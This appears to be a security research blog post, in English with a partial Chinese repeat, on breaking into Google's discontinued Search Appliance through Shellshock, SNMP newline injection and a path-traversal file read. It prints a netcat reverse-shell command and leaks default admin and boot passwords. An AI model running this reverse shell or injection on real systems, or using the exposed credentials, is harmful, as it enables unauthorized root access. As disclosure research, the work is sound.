Quantcast
Channel: DEVCORE 戴夫寇爾
Viewing all 145 articles
Browse latest View live

[REL] A Journey Into Hacking Google Search Appliance

$
0
0

English Version, 中文版本

TL;DR

  • GSA Admin console post-authentication Remote Code Execution.
  • GSA Search interface Path traversal.
  • GSA uses Oracle’s Outside-in Technology to convert documents.
  • Google Web services have some fixed URIs that provide information about the service itself.

Introduction

The Google Search Appliance (hereinafter referred to as GSA) is an enterprise search device launched by Google in 2002, used for indexing and retrieving internal or public network information. Around 2005, Google introduced the Google Mini for personal and small business use. Later, at the end of 2008, a virtual machine version was launched, called the Virtual Google Search Appliance (hereinafter referred to as VGSA). However, at the end of 2018, Google ended the life cycle of the GSA product and integrated it into the Cloud Search product line.

Appliance and Software Acquisition

We managed to purchase a device by searching “Google Search Appliance” on eBay.

Luckily, the first one we bought was a GSA with unerased data:

Even now, you can still find devices that are currently being sold.

On the other hand, The original public link of vGSA has been removed. http://dl.google.com/vgsa/vgsa_20090210.7z [removed] http://dl.google.com/vgsa/vgsa_20081028.7z [removed]

We found the file on BitTorrent magnet link:

magnet:?xt=urn:btih:89388ACE8C3B91FDD3A2F86D8CBB78C58A70D992

Next, found the link to the old version software from Google Groups: https://groups.google.com/g/google-search-appliance-help/c/Qn5aO5r2Joo/m/PTw8ZDWu6vYJ

The link was:

http://dl.google.com/dl/enterprise/install_bundle-10000622-7.2.0-112.bin [removed]

And we can obtain all version number from: http://web.archive.org/web/20210116194907/https://support.google.com/gsa/answer/7020590?hl=en&ref_topic=2709671

Guessing the File Naming Rules as install_bundle-10000(3-digit numbers)-7.(numbers).(numbers)-(numbers).bin

And write a shell script to attempt downloading software:

for((j=622;j<999;+j));do for((i=1;i<444;+i));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.2.0-$i.bin;done;done
for((j=661;j<999;+j));do for((i=1;i<444;+i));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.4.0-$i.bin;done;done
for((j=693;j<999;+j));do for((i=1;i<444;+i));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.6.0-$i.bin;done;done

Including the information found through internet search, successfully retrieved the following file:

all_langs-lang-pack-2.1-1.bin
all_langs-lang-pack-2.2-1.bin
centos_patch_files-6.0.0-22.bin
centos_patch_files-6.14.0-28.bin
centos_patch_files-7.0.14-238.bin
centos_patch_files-7.2.0-252.bin
centos_patch_files-7.2.0-264.bin
centos_patch_files-7.2.0-270.bin
centos_patch_files-7.2.0-280.bin
centos_patch_files-7.2.0-286.bin
install_bundle-10000653-7.2.0-252.bin
install_bundle-10000658-7.2.0-264.bin
install_bundle-10000661-7.2.0-270.bin
install_bundle-10000681-7.4.0-64.bin
install_bundle-10000685-7.4.0-72.bin
install_bundle-10000686-7.4.0-74.bin
install_bundle-10000692-7.4.0-82.bin
install_bundle-10000762-7.6.0-36.bin
install_bundle-10000767-7.6.0-42.bin
install_bundle-10000772-7.6.0-46.bin
install_bundle-10000781-7.6.0-58.bin
install_bundle-10000810-7.6.50-30.bin
install_bundle-10000822-7.6.50-36.bin
install_bundle-10000855-7.6.50-64.bin
install_bundle-10000878-7.6.250-12.bin
install_bundle-10000888-7.6.250-20.bin
install_bundle-10000901-7.6.250-26.bin
install_bundle-10000915-7.6.360-10.bin
install_bundle-10000926-7.6.360-16.bin
install_bundle-10000967-7.6.512-18.bin
sw_files-5.0.4-22.bin
sw_files-6.14.0-28.bin
sw_files-7.0.14-238.bin
vm_patch_1_for_504_G22_and_G24_only.bin

vGSA (Virtual Google Search Appliance)

Next, we began research on vGSA. By default, after importing the virtual machine, this system only provides a function for network configuration and doesn’t provide a system shell for operation or use. However, because the virtual machine operates within ours own environment, it is usually possible to obtain system permissions through the following methods:

  • Directly altering unencrypted disk files
  • Modifying the virtual machine memory
  • Booting using CDs or disks from another operating system
  • Exploiting known vulnerabilities
  • Utilizing hard-coded administrator or system account passwords

The following image shows the network configuration screen:

CVE-2014-6271

When testing early Linux appliances and servers, especially those using the RedHat series operating system, there are often Shellshock vulnerabilities, and the 2008 released vGSA is no exception. Inserting option 114 in the DHCP server will be set in the environment variable, thereby triggering the vulnerability and executing any command.

The command attempted to be inserted is: useradd zzzzgsa. This command can be observed to be executed repeatedly, as error messages continue to appear in the console output.

vGSA operation system observation

After successfully obtaining operating system privileges, we can observe the network environment, the running applications, and the file system. Here are some insights gained from observing the operating system environment:

  • Version number is 5.2.0.G.27.
  • Services are mainly written in C/C++, Java, Python.
  • /export/hda3 seems to be the directory primarily used by the service.
  • /etc/shadow contains the root account with password hash x███████████M.
  • Administration interface listening on port 8000, 8443 with default admin password, j0njlRXpU5CQ.
  • /.gnupg contains ent_box_key public and private keys.
  • /.gnupg contains google_license_key public key.
  • /.ssh/authorized_keys contains two sets of public keys.
  • /root/.ssh/authorized_keys contains one set of public keys.
  • /root/.ssh/ contains two sets of SSH public and private keys.
  • /root/.gnupg/ contains ent_box_key public and private keys.
  • Oracle’s Outside In Technology is used to convert documents into HTML web pages.
  • The Java runtime environment uses a Security Manager for protection.
  • The request for engineer support function uses ppp to build a virtual private network, /etc/ppp/chap-secrets contains account passwords ( z██████c、]███████T ).
  • The boot menu password in /etc/lilo.conf is cmBalx7.
  • /export/hda3/versionmanager/google_key.symmetric has a string that seems to be used for symmetric encryption.
  • /export/hda3/versionmanager/vmanager_passwd contains two sets of username-password combinations ( admin: M█████████████████████████w=:9██= google:w█████████████████████████o=:N██= ).

Executable programs with network services are as follows:

Listen PortProcess NameProgram LanguageFunction
22sshC/C++OpenSSH Server
53namedC/C++Bind Named
953namedC/C++Bind Named
1111webserver_configpythonInstaller
2100adminrunner.pypythonadmin console backend
3990monitorC/C++monitor
4000rtserverC/C++unknown
4430EnterpriseFrontendJava (with security manager)admin console frontend
4911borgmonC/C++borgmon
4916reactorC/C++unknown
5000rtserverC/C++unknown
5600rtserverC/C++unknown
6600cacheserverC/C++unknown
7800EnterpriseFrontendJava (with security manager)admin console frontend (http)
7880TableServerJava (with security manager)unknown
7882AuthzCheckerJava (without security manager)unknown
7886tomcatJavatomcat server
8000EnterpriseAdminConsoleJava (without security manager)unknown
8443stunnelC/C++redirect http to https
8888GWSC/C++unknown
9300oneboxserverC/C++unknown
9328entspellmixerC/C++unknown
9400mixserverC/C++unknown
9402mixserverC/C++unknown
9448qrewriteC/C++unknown
9450EnterpriseAdminConsoleJava (without security manager )unknown
10094enterprise_oneboxC/C++unknown
10200clustering_serverC/C++unknown
11913sessionmanagerC/C++unknown
12345RegistryServerJava (without security manager)unknown
19780configmgr/ent_configmgr.pypythonunknown
19900feedergateC/C++extract, transform and feed records
21200FileSystemGatewayJava (with security manager)unknown
31300rtserverC/C++unknown

Despite the presence of so many services, most connections are blocked by iptables. The following are the iptables settings:

# Redirect privileged ports.# (we listen as nobody, which can't attach to low ports, so redirect to high ports)#-A PREROUTING -i eth0 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 7800
-A PREROUTING -i eth0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 4430
-A PREROUTING -i eth0 -p tcp -m tcp --dport 444 -j REDIRECT --to-ports 4431
-A INPUT -i eth0 -p udp -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7800 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7801 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4430 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4431 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 19900 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8000 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8443 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9941 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9942 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 10999 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --sport 68 --dport 67 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 53 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 137:138 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 123 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 514 -j ACCEPT
-A INPUT -i eth0 -p udp -m udp --dport 161 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --sport 161 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 162 -j ACCEPT

The following summarizes the actual accessible TCP attack surface:

PortServiceProgram Location
22ssh/usr/sbin/sshd
7800EnterpriseFrontend/export/hda3/5.2.0/local/google/bin/EnterpriseFrontend.jar
4430EnterpriseFrontend/export/hda3/5.2.0/local/google/bin/EnterpriseFrontend.jar
19900feedergate/export/hda3/5.2.0/local/google/bin/feedergate
8000EnterpriseAdminConsole/export/hda3/5.2.0/local/google/bin/EnterpriseAdminConsole.jar
8443stunnel/usr/sbin/stunnel

And we found that the strings in file /export/hda3/versionmanager/google_key.symmetric can be used to decrypt the content of all install bundles! After gaining privileges using CVE-2014-6271 and decrypting the contents of the install bundle, our research on vGSA has temporarily concluded.

But its lacks of memory protection might have some vulnerabilities that can be easily exploited.

GSA

Upon booting the installed appliance and attempting to change the boot sequence, we found that a password is required to enter the BIOS. Moreover, only some functions are accessible in the management interface of the Dell H700 RAID card:

Next, attempt to directly read the contents of the hard drive. If the hard drive content is not encrypted, there is a chance that the device’s operating system and software can be obtained directly. We found that its hard drive uses SAS interface for transmission. Before attempting, it is necessary to purchase a SAS HBA card. The LSI 9211-8i is used for connection in this test:

After connecting and attempting to read, it was discovered that this is a Self-Encrypting Drive (SED). It requires a password to unlock for access. OSSLab has a more detailed explanation here:

https://www.osslab.com.tw/ata-sed-security/ (chinese article)

There are several ways to continue trying when the hard drive cannot be directly accessed:

  • Try to read the password in the BIOS EEPROM and change the boot order.

This method requires damage to the motherboard and carries some risk. This method is only used when no vulnerabilities can be found at the software level. More information: https://blog.cybercx.co.nz/bypassing-bios-password

  • Use PCILeech to read, write memory to gain system privileges.

This method requires specific PCI-e devices, which were not prepared at the time. You can refer to this GitHub project:

https://github.com/ufrisk/pcileech

  • Look for software vulnerabilities that can access the service

This method is simpler and more feasible.

LF injection in Admin Console

After logging into the admin console, we observed a feature for obtaining system information through SNMP. Additionally, this feature allows the insertion of custom strings.:

We tried classic LF injection here:

Inject sysContact with a LF and following command:

extend shell /bin/nc -e /bin/sh 10.5.2.1 4444

After inserting the configuration value “extend”, we can use the command “snmpwalk” to trigger the SNMP’s extend functionality and execute a shell.

Command executed successfully, and connected back with a shell.

Arbitrary File Reading

From GSA 6.x series versions, we found that the 80/443 web services use Apache httpd in the RPM installation package. There are several http configurations located in /etc/httpd/conf.d/. In the files gsa-http.conf and gsaa-https.conf, certain directories are redirected to specific local services.

  RewriteEngine on
  RewriteRule ^/security-manager/(.*) http://localhost:7886/security-manager/$1 [P,L]
  RewriteRule ^/d██████████/(.*) http://localhost:7890/dps/d██████████/$1 [P,L]
  RewriteRule ^/s██████/(.*) http://localhost:7890/dps/s██████/$1 [P,L]
  RewriteRule ^/v█████/(.*) http://localhost:7890/v█████/$1 [P,L]
  RewriteRule ^/$ http://localhost:7800/ [P,L]
  RewriteRule ^/(.*) http://localhost:7800/$1 [P,L]

The communication ports 7886 and 7890 are services run by separate Apache Tomcat servers. When proxying two or more web servers, the path determination of Tomcat, ..;/, is an interesting test point. You can refer to the article written by our employee for more details:

https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf

The point we’re interested in is dps, which doesn’t seem to be present in the old version of GSA. Extracting /WEB-INF/web.xml from dps.war allows us to inspect the web application configuration, and we’ve found that the endpoint of /font will handled by com.documill.dps.connector.servlet.user.DPSDownloadServlet

<servlet><servlet-name>font</servlet-name><servlet-class>com.documill.dps.connector.servlet.user.DPSDownloadServlet</servlet-class><init-param><param-name>rootDirectory</param-name><param-value>work/fonts/</param-value></init-param></servlet><servlet-mapping><servlet-name>font</servlet-name><url-pattern>/font/*</url-pattern></servlet-mapping>

And looking into DPSDownloadServlet

importcom.davisor.net.servlet.DownloadServlet;importcom.documill.dps.*;importjava.io.*;importjavax.servlet.ServletContext;publicclassDPSDownloadServletextendsDownloadServletimplementsDPSUserService{publicDPSDownloadServlet(){}protectedStringgetRealPath(ServletContextservletcontext,Strings)throwsIOException{DPSdps=DPSSingleton.getDPS();Filefile=dps.getHomeDir();if(file==null)thrownewFileNotFoundException("DPSDownloadServlet:getRealPath:DPS home directory not specified");elsereturn(newFile(file,s)).getAbsolutePath();}privatestaticfinallongserialVersionUID=0L;}

Step into com.davisor.net.servlet.DownloadServlet which extends DPSDownloadServlet

protectedvoidservice(HttpServletRequesthttpservletrequest,HttpServletResponsehttpservletresponse)throwsServletException,IOException{Strings=httpservletrequest.getParameter(uriParameterName);if(!isValid(s)){httpservletresponse.sendError(400,(newStringBuilder()).append("Invalid file path: ").append(s).toString());return;}Filefile=rootDirectory.deriveFile(s);if(!file.isFile())httpservletresponse.sendError(404,(newStringBuilder()).append("No file:").append(s).toString());elseif(!file.canRead()){httpservletresponse.sendError(403,(newStringBuilder()).append("Unreadable file:").append(s).toString());}else{longl=file.length();if(l>0x7fffffffL){httpservletresponse.sendError(413,(newStringBuilder()).append("File too big:").append(l).toString());}else{Strings1=MIME.getTypeFromPath(file.getName(),"application/octet-stream");httpservletresponse.setContentLength((int)l);httpservletresponse.setContentType(s1);httpservletresponse.setDateHeader("Last-Modified",file.lastModified());if(cacheExpires>0L){httpservletresponse.setDateHeader("Expires",System.currentTimeMillis()+cacheExpires);httpservletresponse.setHeader("Cache-Control","public");}IO.copy(file,httpservletresponse.getOutputStream());}}}privatestaticbooleanisValid(Strings){return!Strings.isEmpty(s)&&!s.contains("..");}

You can see here that the only check is whether the string contains ... However, we can directly specify the absolute path and read any local file directly!

The old version of GSA does not have the /font endpoint, but /dps/admin/admin has a similar file reading issue. You can directly specify the logName for file reading. Refer to the diagram below for directly reading the account password from the system management interface:

After successfully cracking the hash, you can log in, enable the SNMP service, and combine it with the first vulnerability to execute arbitrary commands with root privileges.

Other findings and misc

Internal URIs in web services

In GSA, there are multiple sub-services that communicate with each other using the HTTP protocol. Many of these services offer URLs such as /varz, /helpz, and /procz. We can access them either in the trusted network location defined for the service or using 127.0.0.1:

In vGSA, we observed that there is a service execution parameter called “useripheader=X-User-Ip”, this parameter allows direct access to a certain functionality of the externally exposed admin console when included in the request header as “X-User-Ip”.

The /procz endpoint can even fetch executables and the shared libraries they are using:

Appliances list

Model nameMakerSpecsversionDocument amount
Google MiniGigabytePentium III 1G / 2GB memory / 120G3.4.14300,000
Google Mini-002XSuperMicroPentium 4 3G / 2GB memory / 250G HDD5.0.0unknown
Google GB-1001Dell Poweredge 2950Xeon / 16GB memory / 1.25TB HDDunknown3,000,000
Google GB-1002Gigabyteunknownunknownunknown
Google GB-7007Dell R710Xeon E5520 / 48GB memory / 3TB HDDunknown10,000,000
Google GB-9009Dell unknownXeon X5560 / 96GB memory / 3.6TB HDDunknown30,000,000
Google G100Dell R720XDunknownunknownunknown

Linux Kernel Version

GSA versionLinux Kernel Version
7.6.0Linux version 3.14.44_gsa-x64_1.5 (mrevutskyi@mrevutskyi.mtv.corp.google.com) (gcc version 4.9.x-google 20150123 (prerelease) (Google_crosstoolv18-gcc-4.9.x-x86_64-grtev4-linux-gnu) ) #1 SMP Mon Nov 23 09:19:11 PST 2015
7.4.0 
7.2.0Linux version 3.4.3_gsa-x64_1.5 (martincochran@ypc-ubiq202.dls.corp.google.com) (gcc version 4.6.x-google 20120601 (prerelease) (Google_crosstoolv15-gcc-4.6.x-glibc-2.11.1-grte) ) #1 SMP Tue Jul 9 15:36:01 PDT 2013
7.0.14Linux version 3.4.3_gsa-x64_1.3 (stephenamar@neutrino.mtv.corp.google.com) (gcc version 4.6.x-google 20120601 (prerelease) (Google_crosstoolv15-gcc-4.6.x-glibc-2.11.1-grte) ) #1 SMP Thu Jul 19 11:59:57 PDT 2012
5.2.0Linux version 2.6.20_vmw-smp_3.1 (yifeng@yifeng.corp.google.com) (gcc version 4.1.1) #1 SMP Thu Jan 24 22:34:28 PST 2008

Timeline

時間事件
2005/06/10Java Code Injection CVE-2005-3757 reported by H D Moore
early 2008GSA 5.0 released
2008/10/28vgsa_20081028.7z (5.2.0) released
2013/04/20GSA 6.14.0.G28 released
2014/03/20Cross-site Scripting CVE-2014-0362 reported by Will Dormann
2014/10/01GSA 7.0.14.G238 released
2014/10/03GSA 7.2.0.G252 released
2014/12/12GSA 7.2.0.G264 released
2015/02/07GSA 7.2.0.G270 released
2015/04/15GSA 7.4.0.G64 released
2015/04/22GSA 7.4.0.G72 released
2015/04/30GSA 7.4.0.G74 released
2015/06/04GSA 7.4.0.G82 released
early 2016Google announced that GSA will be sunset from the market.
2016/01/05XML External Entitiy injection reported by Timo
2016/05/24GSA 7.6.0.G36 released
2016/07/01GSA 7.6.0.G42 released
2016/07/31The author of this article obtained this device, with the version being 7.0.14
2016/08/25GSA 7.6.0.G46 released
2016/10/21GSA 7.6.0.G58 released
2017/01/19GSA 7.6.50.G30 released
2017/04/19GSA 7.6.50.G36 released
2017/07/28GSA 7.6.50.G64 released
2017/11/09GSA 7.6.250.G12 released
2017/12/28The final date to order GSA.
2018/01/17GSA 7.6.250.G20 released
2018/03/21GSA 7.6.250.G26 released
2018/06/15GSA 7.6.360.G10 released
2018/10/08GSA 7.6.360.G16 released
2019/04/26GSA 7.6.512.G18 released. It should be the last publicly released version.
2021/08/16issues reported.
2021/08/16replied from a bot, and triaged.
2021/08/16issuetracker.google.com assigned a issue.
2021/08/18Google said issue is not severe enough to qualify for a reward, but VRP panel will take a closer look.
2021/08/20VRP panel has decided that the security impact of this issue does not meet the bar for a financial reward.
2021/11/01Asking if a vulnerability will be assigned a CVE identifier.
2021/11/02Confirming that a CVE identifier will not be assigned.
early 2023Started writing this article
2023/06/04First draft completed.

Conclusion

Although the GSA/vGSA is a product that has reached the end of its lifecycle, studying how Google increases product security and reduces attack vectors for devices can broaden our knowledge, which we might not usually come into contact with. Although it is not detailed in this article, the Java Security Manager and the Linux Kernel’s seccomp are both technologies used in the GSA, and this research has also left some goals for further study:

  • The feedergate service listening on port 19900.
  • Memory vulnerabilities in Oracle’s Outside-in Technology for converting file formats.
  • The convert_to_html seccomp sandbox

We will share when there are some research results, See you next time.


[REL] 深入破解 Google Search Appliance

$
0
0

English Version, 中文版本

懶人包

  • GSA 管理界面認證後任意指令執行
  • GSA 搜尋介面任意讀檔
  • GSA 使用 Oracle 的 Outside-in Technology 轉換文件格式
  • Google 網頁服務有一些固定的URI,會提供此服務的自身資訊

前言

Google Search Appliance (以下簡稱 GSA ) 是 Google 於2002 年開始為企業推出的搜尋設備,主要功能為放置於企業內網用於索引內部網路資訊並提供檢索。於 2005 年左右推出給個人及小型企業使用的 Google Mini,於 2008 年底左右有發布虛擬機器版本,名稱為 Virtual Google Search Appliance (以下簡稱 vGSA),後來於 2018年底結束產品生命週期,產品線整合進入 Cloud Search。

設備、軟體取得

從 ebay 以關鍵字 Google Search Appliance 搜尋並嘗試購買此設備, 如果不幸硬碟資料已被清除,也只能嘗試多買幾台了。

幸運的是,購入的第一台就是未遭完整清除的 GSA:

現在仍然可以找到正在被販售的設備:

另一方面 vGSA 原始公開連結已被移除, http://dl.google.com/vgsa/vgsa\_20090210.7z [已被移除] http://dl.google.com/vgsa/vgsa\_20081028.7z [已被移除]

後來用 BitTorrent 磁力連結 magnet:?xt=urn:btih:89388ACE8C3B91FDD3A2F86D8CBB78C58A70D992成功取得檔案。

接著再從 google groups 中找到舊版軟體連接:https://groups.google.com/g/google-search-appliance-help/c/Qn5aO5r2Joo/m/PTw8ZDWu6vYJ

連結為:http://dl.google.com/dl/enterprise/install_bundle-10000622-7.2.0-112.bin [已被移除]

由公開網頁中,可取得版本號碼: http://web.archive.org/web/20210116194907/https://support.google.com/gsa/answer/7020590?hl=en&ref_topic=2709671

猜測檔案名稱規則為 install_bundle-10000(三位數字)-7.(一位數字).(數字)-(三位數字).bin

並編寫 shell script 嘗試下載:

for((j=622;j<999;+j));do for((i=1;i<444;+i));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.2.0-$i.bin;done;done
for((j=661;j<999;+j));do for((i=1;i<444;+i));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.4.0-$i.bin;done;done
for((j=693;j<999;+j));do for((i=1;i<444;+i));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.6.0-$i.bin;done;done

加上網路搜尋到的資料,成功取回以下檔案:

all_langs-lang-pack-2.1-1.bin
all_langs-lang-pack-2.2-1.bin
centos_patch_files-6.0.0-22.bin
centos_patch_files-6.14.0-28.bin
centos_patch_files-7.0.14-238.bin
centos_patch_files-7.2.0-252.bin
centos_patch_files-7.2.0-264.bin
centos_patch_files-7.2.0-270.bin
centos_patch_files-7.2.0-280.bin
centos_patch_files-7.2.0-286.bin
install_bundle-10000653-7.2.0-252.bin
install_bundle-10000658-7.2.0-264.bin
install_bundle-10000661-7.2.0-270.bin
install_bundle-10000681-7.4.0-64.bin
install_bundle-10000685-7.4.0-72.bin
install_bundle-10000686-7.4.0-74.bin
install_bundle-10000692-7.4.0-82.bin
install_bundle-10000762-7.6.0-36.bin
install_bundle-10000767-7.6.0-42.bin
install_bundle-10000772-7.6.0-46.bin
install_bundle-10000781-7.6.0-58.bin
install_bundle-10000810-7.6.50-30.bin
install_bundle-10000822-7.6.50-36.bin
install_bundle-10000855-7.6.50-64.bin
install_bundle-10000878-7.6.250-12.bin
install_bundle-10000888-7.6.250-20.bin
install_bundle-10000901-7.6.250-26.bin
install_bundle-10000915-7.6.360-10.bin
install_bundle-10000926-7.6.360-16.bin
install_bundle-10000967-7.6.512-18.bin
sw_files-5.0.4-22.bin
sw_files-6.14.0-28.bin
sw_files-7.0.14-238.bin
vm_patch_1_for_504_G22_and_G24_only.bin

vGSA (Virtual Google Search Appliance)

接著開始 VGSA 的研究,預設情況下完成匯入虛擬機後此系統只提供了一個網路設定的功能, 沒有提供 shell 可供操作使用。但是由於虛擬機器是執行在自己環境上, 所以通常可以透過下列方式取得系統權限:

  • 直接修改未加密的磁碟機檔案
  • 修改虛擬機記憶體內容
  • 使用其他作業系統光碟或磁碟開機
  • 其他已知漏洞
  • 寫死的管理員或系統帳號、密碼

下圖為 vGSA 網路設定畫面:

CVE-2014-6271

當測試早期的 Linux 設備及服務,尤其是使用 RedHat 系列的作業系統時,通常會有 Shellshock 的漏洞, 而發布日期再2008的 vGSA 也不例外。dhcp server 中插入 option 114 會被設置於環境變數,從而觸發漏洞,執行任意指令:

指令為:useradd zzzzgsa,可以從主控台輸出中看到此指令被重複執行,並產生錯誤訊息。

vGSA 觀察

成功取得作業系統權限後,進行網路環境、執行程式、檔案系統的觀察,以下是作業系統環境觀察心得:

  • 版本號為 5.2.0.G.27。
  • 服務主要由 C/C++、java、python 編寫
  • /export/hda3 似乎是服務主要使用的目錄
  • /etc/shadow 存在帳號 root、密碼雜湊為 x███████████M
  • 管理介面 8000、8443 預設管理密碼為 j0njlRXpU5CQ
  • /.gnupg 存在 ent_box_key 公私鑰。
  • /.gnupg 存在 google_license_key 公鑰。
  • /.ssh/authorized_keys 存在兩組公鑰。
  • /root/.ssh/authorized_keys 存在一組公鑰。
  • /root/.ssh/ 存在兩組ssh 公私鑰。
  • /root/.gnupg/ 存在 ent_box_key 公私鑰。
  • 使用 Oracle 公司的 Outside In Technology 將文件轉換為 html網頁。
  • java 執行環境使用 Security Manager 保護。
  • 請求工程師支援功能使用 ppp 建構虛擬私有網路, /etc/ppp/chap-secrets 存有帳號密碼 ( z██████c、]███████T )
  • /etc/lilo.conf中的開機選單密碼為 cmBalx7
  • /export/hda3/versionmanager/google_key.symmetric 有一把疑似為對稱式加密使用的密碼
  • /export/hda3/versionmanager/vmanager_passwd 存在兩組帳密組合 ( admin: M█████████████████████████w=:9██= google:w█████████████████████████o=:N██= )

而具有網路服務的執行程式的觀察如下:

通訊埠服務名稱程式編寫語言服務說明
22sshC/C++OpenSSH Server
53namedC/C++Bind Named
953namedC/C++Bind Named
1111webserver_configpythonInstaller
2100adminrunner.pypythonenterpriseconsole backend
3990monitorC/C++monitor
4000rtserverC/C++未知
4430EnterpriseFrontendJava (with security manager)https 前端
4911borgmonC/C++borgmon
4916reactorC/C++未知
5000rtserverC/C++未知
5600rtserverC/C++未知
6600cacheserverC/C++未知
7800EnterpriseFrontendJava (with security manager)未知
7880TableServerJava (with security manager)未知
7882AuthzCheckerJava (without security manager)未知
7886tomcatJavatomcat server
8000EnterpriseAdminConsoleJava (without security manager)未知
8443stunnelC/C++redirect http to https
8888GWSC/C++未知
9300oneboxserverC/C++未知
9328entspellmixerC/C++未知
9400mixserverC/C++未知
9402mixserverC/C++未知
9448qrewriteC/C++未知
9450EnterpriseAdminConsoleJava (without security manager )未知
10094enterprise_oneboxC/C++未知
10200clustering_serverC/C++未知
11913sessionmanagerC/C++未知
12345RegistryServerJava (without security manager)未知
19780configmgr/ent_configmgr.pypython未知
19900feedergateC/C++未知
21200FileSystemGatewayJava (with security manager)未知
31300rtserverC/C++未知

雖然有這麼多服務,但是 iptables 阻擋了大部分的連線,以下是 iptables 設定:

# Redirect privileged ports.# (we listen as nobody, which can't attach to low ports, so redirect to high ports)#-A PREROUTING -i eth0 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 7800
-A PREROUTING -i eth0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 4430
-A PREROUTING -i eth0 -p tcp -m tcp --dport 444 -j REDIRECT --to-ports 4431
-A INPUT -i eth0 -p udp -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7800 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7801 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4430 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4431 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 19900 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8000 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8443 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9941 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9942 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 10999 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --sport 68 --dport 67 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 53 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 137:138 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 123 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 514 -j ACCEPT
-A INPUT -i eth0 -p udp -m udp --dport 161 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --sport 161 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 162 -j ACCEPT

整理出來實際可存取的TCP 攻擊面:

通訊埠服務名稱程式執行檔所在位置
22ssh/usr/sbin/sshd
7800EnterpriseFrontend/export/hda3/5.2.0/local/google/bin/EnterpriseFrontend.jar
4430EnterpriseFrontend/export/hda3/5.2.0/local/google/bin/EnterpriseFrontend.jar
19900feedergate/export/hda3/5.2.0/local/google/bin/feedergate
8000EnterpriseAdminConsole/export/hda3/5.2.0/local/google/bin/EnterpriseAdminConsole.jar
8443stunnel/usr/sbin/stunnel

而我們發現 /export/hda3/versionmanager/google_key.symmetric中的字串可以用來解密所有 install_bundle 的內容! 使用 CVE-2014-6271 取得權限加上可以解出 install bundle 中的內容後,對 vGSA 的研究就暫時告一段落, 其執行環境中記憶體的保護較為缺少,可能有機會存在弱點並利用:

GSA

安裝設備後嘗試更改開機順序,但發現進入BIOS需要密碼,且磁碟介面卡的管理介面中 Dell H700 僅有部分功能可以操作:

接著嘗試直接讀取硬碟內容,如果硬碟內容沒有加密,有機會能直接取得設備作業系統及軟體。 我們發現其硬碟使用SAS 介面進行傳輸,嘗試前還需購買SAS 卡,本次測試使用LSI 9211-8i 進行連結:

連接嘗試讀取後發現到這是一個自我加密 SED 磁碟,需要密碼unlock 才能存取,OSSLab 這邊有更詳細的解釋:

https://www.osslab.com.tw/ata-sed-security/ (中文)

在無法直接存取硬碟的情況下有幾種方式可以繼續嘗試:

  • 嘗試讀出於BIOS EEPROM 中的密碼,並更改開機順序

此方式需要破壞主機板,有一定風險,於軟體層找不到漏洞才會使用此種方式。 可參考這篇研究 https://blog.cybercx.co.nz/bypassing-bios-password (英文)

  • 使用 PCILeech 讀取、寫入記憶體並取得系統權限

此方式需要特定PCI-e 設備,當時還沒有準備此類設備。可以參考這個 github 專案:

https://github.com/ufrisk/pcileech

  • 尋找可存取服務之軟體漏洞

此方式較為簡單可行。

管理介面換行字元插入

登入管理介面後,觀察到其中有 SNMP 取得系統資訊的功能, 且此功能可以插入自定義字串:

這邊嘗試經典的換行注入:

將 sysContact 插入

extend shell /bin/nc -e /bin/sh 10.5.2.1 4444

插入 extend 設定值之後,就可以用 snmpwalk 觸發 SNMP 的extend 功能, 並執行 shell。

成功執行指令並反連。

任意讀檔

